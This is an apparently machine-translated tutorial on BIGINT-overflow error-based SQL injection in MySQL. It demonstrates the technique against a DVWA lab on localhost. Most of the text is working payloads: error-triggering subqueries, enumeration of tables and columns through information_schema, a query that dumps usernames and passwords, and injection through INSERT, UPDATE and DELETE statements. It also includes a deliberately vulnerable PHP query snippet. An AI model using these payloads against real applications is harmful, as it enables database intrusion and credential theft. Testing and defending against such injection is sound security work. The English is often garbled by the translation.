0x01 Overview
I am very interested in new technology for extracting data errors by MySQL, but this article is to introduce such a technology. When I examine MySQL's integer processing way, when suddenly overflow on how to make it happen generated strong interest. Below, we look at how MySQL is stored integers.
MySQL supports SQL standard integer type INTEGER (or INT) and SMALLINT. As an extension to the standard types, MySQL also supports the integer types TINYINT, MEDIUMINT and BIGINT. The following table shows the storage space required for each range and an integer type.
(Source: http://dev.mysql.com/doc/refman/5.5/en/integer-types.html )
Only MySQL version 5.5.5 and above will produce overflow error message, under the version does not send any messages to integer overflow.
BIGINT length of the data type is 8 bytes, i.e., a length of 64 bits. This data type has a largest symbol value, binary, decimal and hexadecimal representation are "0b0111111111111111111111111111111111111111111111111111111111111111", "0x7fffffffffffffff" and "9223372036854775807." When the value of some numerical operations, such as adding, will cause "BIGINT value is out of range" error.
mysql> select 9223372036854775807+1; ERROR 1690 (22003): BIGINT value is out of range in '(9223372036854775807 + 1)'
In order to avoid such errors appear above, we only need to convert it to an unsigned integer can be.
For unsigned integers is, the maximum value can be stored BIGINT binary, decimal and hexadecimal representation of the words, respectively, " 0b1111111111111111111111111111111111111111111111111111111111111111", " " 0xFFFFFFFFFFFFFFFFand " 18446744073709551615."
Similarly, if the numerical values of calculation expressions, such as addition or subtraction, will lead to "BIGINT value is out of range" error.
# In decimal mysql> select 18446744073709551615+1; ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551615 + 1)' # In binary mysql> select cast(b'1111111111111111111111111111111111111111111111111111111111111111' as unsigned)+1; ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(cast(0xffffffffffffffff as unsigned) + 1)' # In hex mysql> select cast(x'FFFFFFFFFFFFFFFF' as unsigned)+1; ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(cast(0xffffffffffffffff as unsigned) + 1)'
If we take on the value 0 by bit the contrary, the results of what will happen? Of course, is to get a maximum unsigned BIGINT value, this is obvious.
mysql> select ~0; +----------------------+ | ~0 | +----------------------+ | 18446744073709551615 | +----------------------+ 1 row in set (0.00 sec)
So, if we add or subtract ~ 0, it will lead to BIGINT overflow error.
mysql> select 1-~0; ERROR 1690 (22003): BIGINT value is out of range in '(1 - ~(0))' mysql> select 1+~0; ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(1 + ~(0))'
0x002 injection technique
My idea is to use subqueries cause BITINT overflow , thus managed to extract the data. We know that if a query returns successfully, the return value is 0, so its logical negation, then it will become 1, for example, if we have similar ( select*from(select user())xlogical) such a query Africa, it would have:
mysql> select (select*from(select user())x); +-------------------------------+ | (select*from(select user())x) | +-------------------------------+ | root@localhost | +-------------------------------+ 1 row in set (0.00 sec) # Applying logical negation mysql> select !(select*from(select user())x); +--------------------------------+ | !(select*from(select user())x) | +--------------------------------+ | 1 | +--------------------------------+ 1 row in set (0.00 sec)
Yes, too perfect! So, as long as we are able to combine a good bit by bit inverted and inverted logic operation, we will be able to take advantage of an overflow error to successfully injected query.
mysql> select ~0+!(select*from(select user())x); ERROR 1690 (22003): BIGINT value is out of range in '(~(0) + (not((select 'root@localhost' from dual))))'
Let us not use the addition, because the "+" when parsing through a web browser, will be converted to white space (However, you can use the% 2b to represent the "+"). Instead, we can use subtraction. So, the same kind of injection attacks, may have a totally different variants. The final query shown below.
mysql> select (!(select*from(select user())x)-~0); ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not((select 'roo t@localhost' from dual))) - ~(0))' mysql> (select(!x-~0)from(select(select user())x)a); ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localh ost')) - ~(0))' mysql> (select!x-~0.from(select(select user())x)a); ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localh ost')) - ~(0))'
For example, we may be something like the following are implanted operation in a query statement.
mysql> select username, password from users where id='1' or !(select*from(select user())x)-~0; ERROR 1690 (22003): BIGINT value is out of range in '((not((select 'root@localhost' from dual))) - ~(0))'
<http://localhost/dvwa/vulnerabilities/sqli/?id=1' or !(select*from(select user())x)-~0-- -|&Submit=Submit#>
With this BIGINT based overflow error injection technique, we can use almost all of the MySQL mathematical functions, as they can also be negated, specific usage is as follows:
select !atan((select*from(select user())a))-~0; select !ceil((select*from(select user())a))-~0; select !floor((select*from(select user())a))-~0;
Below we've tested, if you wish, you can also find more :)
HEX IN FLOOR CEIL RAND CEILING TRUNCATE TAN SQRT ROUND SIGN
0x003 extract data
The method of extracting data with other techniques of injection attacks, as here only briefly.
First, let's get the table name:
!(select * from (select group_concat(table_name) from information_schema.tables where table_schema=database())x)-~0
Get the column name:
select !(select * from (select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')x)-~0;
Retrieve data:
select !(select * from (select group_concat(id,0x3a,username,0x3a,password) from users)x)-~0;
0x004-time dump
We can dump the all-time database, columns and tables? The answer is yes. However, when we dump data from all database tables and columns, you can only get less results, after all, we are used to retrieve data through the error messages. However, if we are to dump data from the current database, then one can dump up to 27 results. Exemplified below.
!(select*from(select(concat(@:=0,(select count(*)from information_schema.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0
(select(!x-~0)from(select(concat (@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)
(select!x-~0.from(select(concat (@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)
These limitations can retrieve the results of our number, that is up to 27. Hypothesis, we created a data table 31 in a database. So, we can only see 27 results, and my other four tables and other columns in the user data table can not be returned.
Implanting 0x05 insert statement using
By inserting statements, we can also carry out a similar injection attacks, concrete syntax is '' or (payload) or "", use single quotes or double quotes depend on the particular query.
insert into users (id, username, password) values (2, '' or !(select*from(select user())x)-~0 or '', 'Eyre');
We can also use DIOS query.
insert into users (id, username, password) values (2, '' or !(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0 or '', 'Eyre');
、
0x06 injected with the updated statement
Using the update statement, we still may be similarly injected, as shown below:
update users set password='Peter' or !(select*from(select user())x)-~0 or '' where id=4;
0x07 injected using the delete statement
Similarly, we can also use the delete statement to be injected, as shown below:
delete from users where id='1' or !(select*from(select user())x)-~0 or '';
0x08 Summary
The reason of this attack to succeed, because the mysql_error()error message is returned to us, only then will we be able to use it for injection. This function is provided by version 5.5.5 and above. For these overflow attacks, there are many different forms. E.g:
mysql> select !1-0^222; ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not(1)) - (0 ^ 222))' mysql> select !(select*from(select user())a)-0^222; ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not((select 'root@localhost' from dual))) - (0 ^ 222))'
Further, if the back-end code is not double quotation marks or brackets. For example, if I so modify DVWA PHP code, delete id quotes. We do not need a similar operation can be carried out before or injected.
<?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); $num = mysql_numrows($result); $i = 0; while ($i < $num) { $first = mysql_result($result,$i,"first_name"); $last = mysql_result($result,$i,"last_name"); $html .= '<pre>'; $html .= 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; $html .= '</pre>'; $i++; } } ?>
<http://localhost/dvwa/vulnerabilities/sqli/?id=!(select*from(select user())a)-0^222 &Submit=Submit#>
Translator: mssp299
Original Address: https://osandamalith.wordpress.com/2015/07/08/bigint-overflow-error-based-sql-injection/
Reference: https://www.cnblogs.com/lcamry/articles/5509112.html